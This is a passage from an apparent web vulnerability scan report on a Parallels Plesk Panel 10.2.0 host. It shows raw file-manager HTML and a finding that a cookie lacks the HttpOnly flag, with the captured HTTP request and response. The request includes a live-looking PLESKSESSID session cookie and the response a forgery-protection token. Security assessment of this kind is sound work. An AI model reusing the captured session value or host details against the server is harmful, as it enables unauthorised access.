onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_error_docs" 
value="error_docs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();">error_docs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=error_docs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Ferror_docs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpdocs" value="httpdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A 
href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpsdocs" value="httpsdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();" 
onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();">httpsdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpsdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpsdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_private" value="private" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" 
width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fprivate%2F" onClick=";lon();">private</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=private" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fprivate" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_statistics" value="statistics" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fstatistics%2F" onClick=";lon();">statistics</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=statistics" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fstatistics" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_subdomains" value="subdomains" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fsubdomains%2F" 
onClick=";lon();">subdomains</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=subdomains" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fsubdomains" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_vault_scripts" value="vault_scripts" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fvault_scripts%2F" onClick=";lon();">vault_scripts</a></td><td class="number">&nbsp;</td><td 
class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=vault_scripts" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fvault_scripts" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_web_users" value="web_users" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fweb_users%2F" onClick=";lon();">web_users</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" 
width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=web_users" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fweb_users" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_.Security" value=".Security" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=.Security" onClick="return bin();;lon();">.Security</a></td><td class="number">24.1&nbsp;KB</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=.Security" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2F.Security" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=.Security" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.25. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/permissions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/permissions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/permissions/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:35 GMT
Connection: close
Content-Length: 14908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Operation failed</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {
hideinfo_oC(document.forms[0]);
$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/unhandlederror/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function update_oC(f)
       {
           f.cmd.value="update";
           f.submit();
           return false;
       }
       function showinfo_oC(f)
       {
           if (document.getElementById) {
               var el = document.getElementById("bid-unhandlederror-showinfo");
               if (el) {
                   el.className = "hiddenElement";
               }
               var el = document.getElementById("bid-unhandlederror-hideinfo");
               if (el) {
                   el.className = "commonButton";
               var el = document.getElementById("errorArea");
